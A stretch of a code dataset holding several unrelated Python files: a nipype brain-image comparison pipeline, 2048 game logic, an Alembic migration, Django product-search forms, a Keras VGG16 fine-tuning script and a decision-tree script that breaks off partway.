workflows\n#-------------------------------------------------------------------------------\nFlow = 
Workflow(name=scratch)\nFlow.base_dir = temp_path\nif not os.path.isdir(temp_path):\n    os.makedirs(temp_path)\n#-----------------------------------------------------------------------------\n# Inputs and Outputs\n#-----------------------------------------------------------------------------\nfid = open(image_list)\nfile_list = fid.read()\nfile_list = file_list.splitlines()\nfile_list = [os.path.join(images_path, x.strip()) for x in file_list if len(x)]\nfid_reg = open(reg_image_list)\nreg_file_list = fid_reg.read()\nreg_file_list = reg_file_list.splitlines()\nreg_file_list = [os.path.join(reg_images_path, x.strip()) for x in reg_file_list if len(x)]\nSink = Node(DataSink(), name = results_path_name)\nSink.inputs.base_directory = output_path\nSink.inputs.container = results_path_name\nif not os.path.isdir(output_path): os.makedirs(output_path)\n\n#=============================================================================\n# Preprocessing\n#=============================================================================\ndef run_bet_on_files(infiles, f_value=0.5):\n    \"\"\"\n    Run FSL's bet (brain extraction tool).\n\n    Parameters\n    ----------\n    infiles : names of input files\n    f_value : float\n\n    \"\"\"\n    import os\n    from nipype.interfaces.base import CommandLine\n\n    outfiles = []\n    for infile in infiles:\n        outfile = os.path.join(os.getcwd(), 'brain_' + os.path.basename(infile))\n        outfiles.append(outfile)\n\n        cli = CommandLine(command = 'bet2')\n        # bet2 takes the fractional intensity threshold as '-f <value>'\n        cli.inputs.args = ' '.join([infile, outfile, '-f', str(f_value)])\n        cli.run()\n\n    return outfiles\n\nif run_bet:\n\n    bet = Node(name = 'Extract_brains',\n               interface = Fn(function = run_bet_on_files,\n                              iterfield=['infiles'],\n                              input_names = ['infiles',\n                                             'f_value'],\n                              output_names = ['outfiles']))\n    Flow.add_nodes([bet])\n    bet.inputs.infiles = file_list\n    bet.inputs.f_value = 0.25\n    Flow.connect([(bet, Sink, [('outfiles', 'brains')])])\n\n#=============================================================================\n# Comparisons\n#=============================================================================\n#-------------------------------------------------------------------------------\n# Compare image histograms\n# The images from which the histograms were derived do not need to be coregistered.\n#-------------------------------------------------------------------------------\nif do_compare_image_histograms:\n    compute_histograms = Node(name = 'Compute_histograms',\n                              interface = Fn(function = compute_image_histograms,\n                                             iterfield=['infiles'],\n                                             input_names = ['infiles',\n                                                            'nbins',\n                                                            'threshold'],\n                                             output_names = ['histogram_values']))\n    Flow.add_nodes([compute_histograms])\n    if run_bet:\n        Flow.connect([(bet, compute_histograms, [('outfiles','infiles')])])\n    else:\n        compute_histograms.inputs.infiles = file_list\n    compute_histograms.inputs.nbins = 100\n    compute_histograms.inputs.threshold = 0\n\n    compare_histograms = Node(name = 'Compare_histograms',\n                              interface = Fn(function = pairwise_vector_distances,\n                                             input_names = ['vectors',\n                                                            'save_file',\n                                                            'normalize'],\n                                             output_names = ['vector_distances',\n                                                             'outfile']))\n    Flow.add_nodes([compare_histograms])\n    Flow.connect([(compute_histograms, compare_histograms,\n                   [('histogram_values','vectors')])])\n    compare_histograms.inputs.save_file = True\n    compare_histograms.inputs.normalize = True\n\n    Flow.connect([(compare_histograms, Sink, [('outfile', 
'histograms')])])\n\n#-------------------------------------------------------------------------------\n# Register each image to a reference image\n#-------------------------------------------------------------------------------\nif do_register_images_to_ref_images:\n register = Node(name = 'Register',\n interface = Fn(function = register_images_to_ref_images,\n input_names = ['files',\n 'ref_file_index',\n 'max_angle',\n 'flirt_command'],\n output_names = ['outfiles']))\n Flow.add_nodes([register])\n if run_bet:\n Flow.connect([(bet, register, [('outfiles','files')])])\n else:\n register.inputs.files = reg_file_list\n register.inputs.ref_file_index = 1\n register.inputs.max_angle = max_angle\n register.inputs.flirt_command = 'flirt.fsl'\n #Flow.connect([(register, Sink, [('outfiles', 'registrations.@transforms')])])\n\n transform = Node(name = 'Transform',\n interface = Fn(function = apply_transforms,\n input_names = ['files',\n 'ref_file_index',\n 'transform_files',\n 'interp',\n 'flirt_command'],\n output_names = ['outfiles']))\n Flow.add_nodes([transform])\n if run_bet:\n Flow.connect([(bet, transform, [('outfiles','files')])])\n else:\n transform.inputs.files = file_list\n transform.inputs.ref_file_index = 1\n Flow.connect([(register, transform, [('outfiles', 'transform_files')])])\n transform.inputs.interp = interp\n transform.inputs.flirt_command = 'flirt.fsl'\n Flow.connect([(transform, Sink, [('outfiles', 'registrations.@images')])])\n\n#-------------------------------------------------------------------------------\n# Threshold images\n#-------------------------------------------------------------------------------\nif do_threshold_images:\n threshold = Node(name = 'Threshold',\n interface = Fn(function = threshold_images,\n input_names = ['files',\n 'threshold_value',\n 'save_files'],\n output_names = ['outfiles']))\n Flow.add_nodes([threshold])\n Flow.connect([(transform, threshold, [('outfiles', 'files')])])\n threshold.inputs.threshold_value = threshold_value\n threshold.inputs.save_files = True\n Flow.connect([(threshold, Sink, [('outfiles', 'thresholds')])])\n\n#-------------------------------------------------------------------------------\n# Compute image similarities\n#-------------------------------------------------------------------------------\nif do_compute_image_similarities:\n similarity = Node(name = 'Similarity',\n interface = Fn(function = compute_image_similarities,\n input_names = ['files',\n 'intersect_masks',\n 'metric',\n 'save_file'],\n output_names = ['pairwise_similarities',\n 'outfile']))\n Flow.add_nodes([similarity])\n if do_threshold_images:\n Flow.connect([(threshold, similarity, [('outfiles', 'files')])])\n else:\n Flow.connect([(transform, similarity, [('outfiles', 'files')])])\n similarity.inputs.intersect_masks = True\n similarity.inputs.metric = 'cc'\n similarity.inputs.save_file = True\n Flow.connect([(similarity, Sink, [('outfile', 'similarities')])])\n\n#-------------------------------------------------------------------------------\n# Compute image overlaps\n#-------------------------------------------------------------------------------\nif do_compute_image_overlaps:\n overlaps = Node(name = 'Overlaps',\n interface = Fn(function = compute_image_overlaps,\n input_names = ['files',\n 'list_of_labels',\n 'save_file'],\n output_names = ['pairwise_overlaps',\n 'outfile']))\n Flow.add_nodes([overlaps])\n Flow.connect([(threshold, overlaps, [('outfiles', 'files')])])\n overlaps.inputs.list_of_labels = [1]\n overlaps.inputs.save_file = True\n 
Flow.connect([(overlaps, Sink, [('outfile', 'overlaps')])])\n\n##############################################################################\nif __name__ == '__main__':\n    #Flow.write_graph(graph2use='flat')\n    #Flow.write_graph(graph2use='hierarchical')\n    Flow.run()\n","repo_name":"binarybottle/mindboggle_sidelined","sub_path":"compare_images_pipeline.py","file_name":"compare_images_pipeline.py","file_ext":"py","file_size_in_byte":13593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"73807158595","text":"import random\r\ndef incepe_jocul():\r\n    mat = []\r\n    for i in range(4):\r\n        mat.append([0]*4)\r\n    print(\"The commands are the following:\")\r\n    print(\"W or w to move up\")\r\n    print(\"S or s to move down\")\r\n    print(\"A or a to move left\")\r\n    print(\"D or d to move right\")\r\n    adauga_nou_2(mat)\r\n    return mat\r\ndef adauga_nou_2(mat):\r\n    r = random.randint(0, 3)\r\n    c = random.randint(0, 3)\r\n    while(mat[r][c] != 0):  # draw cells until an empty one is found\r\n        r = random.randint(0, 3)\r\n        c = random.randint(0, 3)\r\n    mat[r][c] = 2\r\ndef status_joc(mat):\r\n    for i in range(4):\r\n        for j in range(4):\r\n            if(mat[i][j] == 2048):\r\n                return 'You won!'\r\n    for i in range(4):\r\n        for j in range(4):\r\n            if(mat[i][j] == 0):\r\n                return 'The game is not over'\r\n    for i in range(3):\r\n        for j in range(3):\r\n            if(mat[i][j] == mat[i+1][j] or mat[i][j] == mat[i][j+1]):\r\n                return 'The game is not over'\r\n    for j in range(3):\r\n        if(mat[3][j] == mat[3][j+1]):\r\n            return 'The game is not over'\r\n    for i in range(3):\r\n        if(mat[i][3] == mat[i+1][3]):\r\n            return 'The game is not over'\r\n    return 'You lost'\r\ndef compresie(mat):\r\n    changed = False\r\n    nou_mat = []\r\n    for i in range(4):\r\n        nou_mat.append([0] * 4)\r\n    for i in range(4):\r\n        pos = 0\r\n        for j in range(4):\r\n            if(mat[i][j] != 0):\r\n                nou_mat[i][pos] = mat[i][j]\r\n                if(j != pos):\r\n                    changed = True\r\n                pos += 1\r\n    return nou_mat , changed\r\ndef schmb(mat):\r\n    changed = False\r\n    for i in range(4):\r\n        for j in range(3):\r\n            if(mat[i][j] == mat[i][j+1] and mat[i][j] != 0):\r\n                mat[i][j] = mat[i][j] * 2\r\n                mat[i][j+1] = 0\r\n                changed = True\r\n    return mat, changed\r\ndef inversare(mat):\r\n    nou_mat = []\r\n    for i in range(4):\r\n        nou_mat.append([])\r\n        for j in range(4):\r\n            nou_mat[i].append(mat[i][3-j])\r\n    return nou_mat\r\ndef transp(mat):\r\n    nou_mat = []\r\n    for i in range(4):\r\n        nou_mat.append([])\r\n        for j in range(4):\r\n            nou_mat[i].append(mat[j][i])\r\n    return nou_mat\r\ndef mrg_stanga(grid):\r\n    nou_grid, changed1 = compresie(grid)\r\n    nou_grid, changed2 = schmb(nou_grid)\r\n    changed = changed1 or changed2\r\n    nou_grid, temp = compresie(nou_grid)\r\n    return nou_grid, changed\r\ndef mrg_dreapta(grid):\r\n    nou_grid = inversare(grid)\r\n    nou_grid, changed = mrg_stanga(nou_grid)\r\n    nou_grid = inversare(nou_grid)\r\n    return nou_grid, changed\r\ndef mrg_sus(grid):\r\n    nou_grid = transp(grid)\r\n    nou_grid, changed = mrg_stanga(nou_grid)\r\n    nou_grid = transp(nou_grid)\r\n    return nou_grid, changed\r\ndef mrg_jos(grid):\r\n    nou_grid = transp(grid)\r\n    nou_grid, changed = mrg_dreapta(nou_grid)\r\n    nou_grid = transp(nou_grid)\r\n    return nou_grid, changed\r\n","repo_name":"mario221098/proiect-lp2","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39977554947","text":"\"\"\"Change view.ip to 
session_id\n\nRevision ID: ad8901675aaf\nRevises: 100960102822\nCreate Date: 2020-03-14 13:24:08.400161\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'ad8901675aaf'\ndown_revision = '100960102822'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('view', sa.Column('session_id', sa.String(length=200), nullable=True))\n op.drop_column('view', 'ip')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('view', sa.Column('ip', mysql.VARCHAR(collation='utf8mb4_unicode_ci', length=15), nullable=True))\n op.drop_column('view', 'session_id')\n # ### end Alembic commands ###\n","repo_name":"treetrnk/webserialist.com","sub_path":"migrations/versions/ad8901675aaf_change_view_ip_to_session_id.py","file_name":"ad8901675aaf_change_view_ip_to_session_id.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"862515061","text":"# -*- coding: utf-8 -*-\nfrom django import forms\n\n\nclass VarenavnForm(forms.Form):\n varenavn = forms.CharField(max_length=80, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n\nclass VaretypeForm(forms.Form):\n CHOICES = (\n ('Akevitt', 'Akevitt'),\n ('Portvin', 'Portvin'),\n ('Vodka', 'Vodka'),\n ('Druebrennevin', 'Druebrennevin'),\n ('Whisky', 'Whisky'),\n ('Likør', 'Likør'),\n ('Genever', 'Genever'),\n ('Gin', 'Gin'),\n ('Bitter', 'Bitter'),\n ('Fruktbrennevin', 'Fruktbrennevin'),\n ('Vermut', 'Vermut'),\n ('Aromatisert vin', 'Aromatisert vin'),\n ('Brennevin. annet', 'Brennevin. annet'),\n ('Sherry', 'Sherry'),\n ('Rødvin', 'Rødvin'),\n ('Hvitvin', 'Hvitvin'),\n ('Perlende vin. rosé', 'Perlende vin. rosé'),\n ('Champagne. brut', 'Champagne. brut'),\n ('Champagne. sec', 'Champagne. sec'),\n ('Musserende vin. rosé', 'Musserende vin. rosé'),\n ('Champagne. rosé', 'Champagne. rosé'),\n ('Musserende vin', 'Musserende vin'),\n ('Alkoholfri most', 'Alkoholfri most'),\n ('Alkoholfritt. øvrig', 'Alkoholfritt. øvrig'),\n ('Rosévin', 'Rosévin'),\n ('Porter & stout', 'Porter & stout'),\n ('Alkoholfritt øl', 'Alkoholfritt øl'),\n ('Champagne extra brut', 'Champagne extra brut'),\n ('India pale ale', 'India pale ale'),\n ('Saison farmhouse ale', 'Saison farmhouse ale'),\n ('Lys ale', 'Lys ale'),\n ('Rom', 'Rom'),\n ('Klosterstil', 'Klosterstil'),\n ('Spesial', 'Spesial'),\n ('Mørk lager', 'Mørk lager'),\n ('Barley wine', 'Barley wine'),\n ('Hveteøl', 'Hveteøl'),\n ('Pale ale', 'Pale ale'),\n ('Perlende vin. rød', 'Perlende vin. rød'),\n ('Sterkvin. annen', 'Sterkvin. annen'),\n ('Fruktvin', 'Fruktvin'),\n ('Sider', 'Sider'),\n ('Perlende vin. hvit', 'Perlende vin. hvit'),\n ('Brown ale', 'Brown ale'),\n ('Alkoholfri vin', 'Alkoholfri vin'),\n ('Alkoholfri musserende drikk', 'Alkoholfri musserende drikk'),\n ('Lys lager', 'Lys lager'),\n ('Alkoholfri leskedrikk', 'Alkoholfri leskedrikk'),\n ('Red/amber', 'Red/amber'),\n ('Sake', 'Sake'),\n ('Surøl', 'Surøl'),\n ('Madeira', 'Madeira'),\n ('Mjød', 'Mjød'),\n ('Brennevin. nøytralt < 37.5 %', 'Brennevin. nøytralt < 37.5 %'),\n ('Champagne. annen', 'Champagne. 
annen'),\n )\n varetype = forms.MultipleChoiceField(label='', choices=CHOICES,\n widget=forms.SelectMultiple(\n attrs={'class': 'selectpicker', 'title': 'Velg varetyper'}),\n required=False)\n\n\nclass PrisForm(forms.Form):\n pris_0 = forms.DecimalField(required=False, label='',\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n pris_1 = forms.DecimalField(required=False, label='',\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n\nclass VolumForm(forms.Form):\n volum_0 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n volum_1 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n\nclass AlkoholForm(forms.Form):\n alkohol_0 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n alkohol_1 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n\nclass EnhetsprisForm(forms.Form):\n enhetspris_0 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n enhetspris_1 = forms.DecimalField(min_value=0, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n\nclass LandForm(forms.Form):\n land = forms.CharField(label='', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n\nclass ProdusentForm(forms.Form):\n produsent = forms.CharField(label='', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n\nclass Butikkategoriform(forms.Form):\n butikkategori = forms.CharField(label='', required=False, widget=forms.TextInput(\n attrs={'class': 'form-control', 'placeholder': 'Kategori 1-7'}))\n\n\nclass SorteringsForm(forms.Form):\n CHOICES = (\n ('enhetspris', 'enhetspris'),\n ('-enhetspris', '-enhetspris'),\n ('alkohol', 'alkohol'),\n ('-alkohol', '-alkohol'),\n ('volum', 'volum'),\n ('-volum', '-volum'),\n ('pris', 'pris'),\n ('-pris', '-pris'),\n ('varetype', 'varetype'),\n ('-varetype', '-varetype'),\n ('varenavn', 'varenavn'),\n ('-varenavn', '-varenavn'),\n )\n o = forms.ChoiceField(\n choices=CHOICES,\n label='',\n required=False\n )\n\n\nclass BolForm(forms.Form):\n groups = (\n ('ol', 'ol'),\n ('sprit', 'sprit'),\n ('aperitif-dessert', 'aperitif-dessert'),\n ('mousserande-viner', 'mousserande-viner'),\n ('roda-viner', 'roda-viner'),\n ('cider-och-blanddrycker', 'cider-och-blanddrycker'),\n ('vita-viner', 'vita-viner'),\n ('alkoholfritt', 'alkoholfritt'),\n )\n\n sortChoices = (\n 'alcoholPrice',\n '-alcoholPrice',\n 'name',\n '-name',\n 'group',\n '-group',\n 'price',\n '-price',\n 'volume',\n '-volume',\n 'alcohol',\n '-alcohol',\n )\n navn = forms.CharField(max_length=80, label='', required=False,\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n kategori = forms.MultipleChoiceField(label='', choices=groups,\n widget=forms.SelectMultiple(\n attrs={'class': 'selectpicker', 'title': 'Velg kategori'}),\n required=False)\n\n pris_0 = forms.DecimalField(required=False, label='',\n widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n pris_1 = forms.DecimalField(required=False, 
label='',\n                                widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n    volum_0 = forms.DecimalField(min_value=0, label='', required=False,\n                                widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n    volum_1 = forms.DecimalField(min_value=0, label='', required=False,\n                                 widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n    alkohol_0 = forms.DecimalField(min_value=0, label='', required=False,\n                                  widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n    alkohol_1 = forms.DecimalField(min_value=0, label='', required=False,\n                                   widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n    alkoholpris_0 = forms.DecimalField(min_value=0, label='', required=False,\n                                       widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Min'}))\n    alkoholpris_1 = forms.DecimalField(min_value=0, label='', required=False,\n                                       widget=forms.TextInput(attrs={'class': 'form-control', 'placeholder': 'Maks'}))\n\n    land = forms.CharField(label='', required=False, widget=forms.TextInput(\n        attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n    produsent = forms.CharField(label='', required=False, widget=forms.TextInput(\n        attrs={'class': 'form-control', 'placeholder': 'Søk'}))\n\n    o = forms.ChoiceField(\n        choices=[(c, c) for c in sortChoices],  # sortChoices holds bare strings; ChoiceField expects (value, label) pairs\n        label='',\n        required=False\n    )\n","repo_name":"simennj/polside","sub_path":"pol/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":8649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3992701407","text":"from keras.applications import VGG16\r\nconv_base = VGG16(weights='imagenet', \r\n                  include_top=False,  # drop the 1000-class classifier head\r\n                  input_shape=(150, 150, 3))\r\n# block5_pool (MaxPooling2D) (None, 4, 4, 512)  /// last layer \r\n# print(conv_base.summary())\r\nimport os\r\nbase_dir = '/Users/limon/for_saves/catalog_small'\r\ntrain_dir = os.path.join(base_dir, 'train')\r\nvalidation_dir = os.path.join(base_dir, 'validation')\r\ntest_dir = os.path.join(base_dir, 'test')\r\n\r\nfrom keras import models\r\nfrom keras import layers\r\nfrom keras import optimizers\r\n\r\n\r\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\nconv_base.trainable = True\r\nset_trainable = False\r\nfor layer in conv_base.layers:\r\n    if layer.name == 'block5_conv1':  # unfreeze from the last conv block onward; everything before it stays frozen\r\n        set_trainable = True\r\n    if set_trainable:\r\n        layer.trainable = True\r\n    else:\r\n        layer.trainable = False\r\n#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\n\r\nmodel = models.Sequential()\r\nmodel.add(conv_base)  #!!!!!!!!\r\nmodel.add(layers.Flatten()) \r\nmodel.add(layers.Dropout(0.5)) \r\nmodel.add(layers.Dense(256, activation='relu'))\r\nmodel.add(layers.Dense(1, activation='sigmoid'))\r\n\r\n\r\n# this way we use the same parameters as in dogs_vs_cats\r\n\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras import optimizers\r\ntrain_datagen = ImageDataGenerator(\r\n    rescale=1./255,\r\n    rotation_range=40,\r\n    width_shift_range=0.2,\r\n    height_shift_range=0.2,\r\n    shear_range=0.2,\r\n    zoom_range=0.2,\r\n    horizontal_flip=True,\r\n    fill_mode='nearest')\r\ntest_datagen=ImageDataGenerator(rescale=1./255)\r\n\r\ntrain_generator=train_datagen.flow_from_directory(\r\n    train_dir,\r\n    target_size=(150,150),\r\n    batch_size=20,\r\n    class_mode='binary')\r\n# validation images are only rescaled, never augmented\r\nval_generator=test_datagen.flow_from_directory(\r\n    validation_dir,\r\n    target_size=(150,150),\r\n    batch_size=20,\r\n    
class_mode='binary')\r\n\r\n\r\nmodel.compile(loss='binary_crossentropy',\r\n optimizer=optimizers.RMSprop(learning_rate=1e-5),\r\n metrics=['acc'])\r\n\r\nhistory = model.fit(\r\n train_generator,\r\n steps_per_epoch=100,\r\n epochs=100,\r\n validation_data=val_generator,\r\n validation_steps=50)\r\n\r\n\r\nmodel.save('cats_and_dogs_small_4.h5')\r\n\r\nimport matplotlib.pyplot as plt \r\n\r\nacc = history.history['acc']\r\nval_acc = history.history['val_acc']\r\nloss = history.history['loss']\r\nval_loss = history.history['val_loss']\r\n\r\nepochs = range(len(acc))\r\n\r\n# plt.plot(epochs, acc, 'bo', label='Training acc')\r\n# plt.plot(epochs, val_acc, 'b', label='Validation acc')\r\n# plt.title('Training and validation accuracy')\r\n# plt.legend()\r\n\r\n# plt.figure()\r\n\r\n# plt.plot(epochs, loss, 'bo', label='Training loss')\r\n# plt.plot(epochs, val_loss, 'b', label='Validation loss')\r\n# plt.title('Training and validation loss')\r\n# plt.legend()\r\n\r\n# plt.show()\r\n\r\ndef smooth_curve(points, factor=0.8):\r\n smoothed_points = []\r\n for point in points:\r\n if smoothed_points:\r\n previous = smoothed_points[-1]\r\n smoothed_points.append(previous * factor + point * (1 - factor))\r\n else:\r\n smoothed_points.append(point)\r\n return smoothed_points\r\n\r\nplt.plot(epochs, smooth_curve(acc), 'bo', label='Smoothed training acc')\r\nplt.plot(epochs, smooth_curve(val_acc), 'b', label='Smoothed validation acc')\r\nplt.title('Training and validation accuracy')\r\nplt.legend()\r\n\r\nplt.figure()\r\n\r\nplt.plot(epochs,smooth_curve(loss), 'bo', label='Smoothed training loss')\r\nplt.plot(epochs, smooth_curve(val_loss), 'b', label='Smoothed validation loss')\r\nplt.title('Training and validation loss')\r\nplt.legend()\r\n\r\nplt.show()\r\n\r\ntest_generator = test_datagen.flow_from_directory(\r\n test_dir,\r\n target_size=(150, 150),\r\n batch_size=20,\r\n class_mode='binary')\r\n\r\ntest_loss, test_acc = model.evaluate_generator(test_generator, steps=50)\r\nprint('test acc:', test_acc)","repo_name":"Ivan137950/dogs_vs_cats","sub_path":"fine_tuning.py","file_name":"fine_tuning.py","file_ext":"py","file_size_in_byte":3810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"196363454","text":"#Part 2 (2nd method): Decision Tree for categorical as well as numerical data\n\nimport pandas\nimport numpy\nimport pprint\nfrom numpy import log2 as log\nfrom matplotlib import pyplot as plt\n\ncsv_path = raw_input(\"Enter path to input CSV file: \")\ndataset = pandas.read_csv(csv_path)\n\n#split data into train data and validation data\nsplitted = numpy.split(dataset, [int(.8 * len(dataset.index))])\ndata = splitted[0].reset_index()\nvalidation_data = splitted[1].reset_index()\n\nX = dataset.keys()[[0,1,2,3,4,5,7,8,9]]\nY = 'left'\n\nvi = dataset.keys()[1]\nfiltered = dataset[(dataset[vi] >= 0) & (dataset[vi] < 380)]\nyy = filtered[Y]\nxx = filtered[vi]\n#plt.scatter(xx, yy)\n#plt.show()\n\nx1 ,y1 = numpy.unique(filtered[filtered[Y] == 0][vi], return_counts=True)\nx2 ,y2 = numpy.unique(filtered[filtered[Y] == 1][vi], return_counts=True)\n\nplt.xlabel(vi)\nplt.ylabel('frequency')\nplt.title('Plot for Visualizing splitting points')\nplt.scatter(x1, y1, label='left=0', color='green')\nplt.scatter(x2, y2, label='left=1', color='red')\nplt.legend()\nplt.show()\n\n\ndef Range_set(att):\n #print att\n if att == 'satisfaction_level':\n return [[0,0.0,0.12],[1,0.12,0.36],[2,0.36,0.47],[3,0.47,0.92],[4,0.92,1.1]]\n\n if att == 
'last_evaluation':\n        return [[0,0.0,0.45],[1,0.45,0.58],[2,0.58,0.77],[3,0.77,1.1]]\n\n    if att == 'number_project':\n        return [[0,0,3],[1,3,6],[2,6,100]]\n\n    if att == 'average_montly_hours':\n        return [[0,0,127],[1,127,162],[2,162,217],[3,217,288],[4,288,1000]]\n\n    if att == 'time_spend_company':\n        return [[0,0,3],[1,3,4],[2,4,5],[3,5,7],[4,7,100]]\n\n\ndef is_categorical(att):\n    if att in dataset.keys()[[5,6,7,8,9]]:\n        return True\n    else:\n        return False\n\n\ndef choose_best_attribute(data, x, measure='entropy'):\n    if len(x) == 1:\n        return x[0]\n\n    notLeft_count = len(data[data[Y] == 0])\n    left_count = len(data[data[Y] == 1])\n    impurity = 0.0\n    if left_count == 0 or notLeft_count == 0:\n        #in this case entropy_val = 0\n        return 'noBest'\n    else:\n        q = float(left_count) / (left_count + notLeft_count)\n        if measure == 'entropy':\n            impurity = - ( q*log(q) + (1-q)*log(1-q) )\n        if measure == 'gini':\n            impurity = 4 * q * (1-q)\n        if measure == 'misclassification':\n            impurity = 2 * min(q, 1-q)\n\n    max_info_gain = float(-99999999999)\n\n    for att in x:\n        impurity_split = 0.0\n\n        if is_categorical(att):\n            attValue = numpy.unique(data[att])\n            for value in attValue:\n                subdata = data[data[att] == value]\n                notLeft_count_split = len(subdata[subdata[Y] == 0])\n                left_count_split = len(subdata[subdata[Y] == 1])\n\n                if left_count_split == 0 or notLeft_count_split == 0:\n                    #in this case entropy_split_val = 0\n                    continue\n                else:\n                    q = float(left_count_split) / (left_count_split + notLeft_count_split)\n\n                    if measure == 'entropy':\n                        impurity_split_val = - ( q*log(q) + (1-q)*log(1-q) )\n                    if measure == 'gini':\n                        impurity_split_val = 4 * q * (1-q)\n                    if measure == 'misclassification':\n                        impurity_split_val = 2 * min(q, 1-q)\n\n                    weight = float( len(subdata.index) ) / len(data.index)\n\n                    impurity_split += weight * impurity_split_val\n\n        else:\n            for Range in Range_set(att):\n                subdata = data[(data[att] >= Range[1]) & (data[att] < Range[2])]\n                notLeft_count_split = len(subdata[subdata[Y] == 0])\n                left_count_split = len(subdata[subdata[Y] == 1])\n\n                if left_count_split == 0 or notLeft_count_split == 0:\n                    #in this case entropy_split_val = 0\n                    continue\n                else:\n                    q = float(left_count_split) / (left_count_split + notLeft_count_split)\n\n                    if measure == 'entropy':\n                        impurity_split_val = - ( q*log(q) + (1-q)*log(1-q) )\n                    if measure == 'gini':\n                        impurity_split_val = 4 * q * (1-q) #scaled to [0,1]\n                    if measure == 'misclassification':\n                        impurity_split_val = 2 * min(q, 1-q) #scaled to [0,1]\n\n                    weight = float( len(subdata.index) ) / len(data.index)\n\n                    impurity_split += weight * impurity_split_val\n\n        #print entropy_split, att\n        info_gain = impurity - impurity_split\n        #print info_gain, att\n        if info_gain > max_info_gain:\n            max_info_gain = info_gain\n            bestAtt = att\n\n        #print \"\"\n\n    if max_info_gain <= 0:\n        return 'noBest'\n\n    #print \"\"\n    #print max_info_gain, bestAtt\n    #print \"\"\n    return bestAtt\n\n\ndef check_purity(y, measure = 'entropy'):\n    left_count = 0\n    notLeft_count = 0\n\n    for value in y:\n        if value == 1:\n            left_count = left_count + 1\n        else:\n            notLeft_count = notLeft_count + 1\n\n    if left_count == 0 and notLeft_count == 0:\n        #in this case we return 1 as majority because we want high recall\n        return 1, 1\n    elif left_count == 0:\n        return 1, 0\n    elif notLeft_count == 0:\n        return 1, 1\n\n    impurity = 0.0\n    q = float(left_count) / (left_count + notLeft_count)\n\n    if measure == 'entropy':\n        impurity = - ( q*log(q) + (1-q)*log(1-q) )\n    if measure == 'gini':\n        impurity = 4 * q * (1-q)\n    if measure == 'misclassification':\n        impurity 
= 2 * min(q, 1-q)\n\n purity = 1 - impurity\n #print purity\n\n if left_count > notLeft_count:\n return purity, 1\n\n else:\n return purity, 0\n\n\ndef build_decision_tree(data, x, measure = 'entropy', tree = None):\n\n #if pure enough\n purity, majority = check_purity(data[Y], measure)\n #print purity, majority\n if purity > 0.65: #gini:0.75, mis:0.85\n return majority\n\n #get an attribute with maximum information gain\n bestAtt = choose_best_attribute(data, x, measure)\n if bestAtt == 'noBest':\n return majority\n\n if tree == None:\n tree = {}\n tree[bestAtt] = {}\n\n if is_categorical(bestAtt):\n #for all categorical values keep growing tree\n attValue = numpy.unique(dataset[bestAtt])\n for value in attValue:\n subdata = data[data[bestAtt] == value]\n #if len(x) == 1:\n # tree[bestAtt][value] = majority\n #else:\n tree[bestAtt][value] = build_decision_tree(subdata, x.drop(bestAtt), measure) #Calling the function recursively\n\n else:\n #divide the numerical data in specified range(s)\n #print Range_set(bestAtt)\n for Range in Range_set(bestAtt):\n subdata = data[(data[bestAtt] >= Range[1]) & (data[bestAtt] < Range[2])]\n #if len(x) == 1:\n # tree[bestAtt][Range[0]] = majority\n #else:\n tree[bestAtt][Range[0]] = build_decision_tree(subdata, x.drop(bestAtt), measure)\n\n return tree\n\n#print type(X)\ndecision_tree = build_decision_tree(data, X)\n#pprint.pprint(decision_tree)\n\ndef 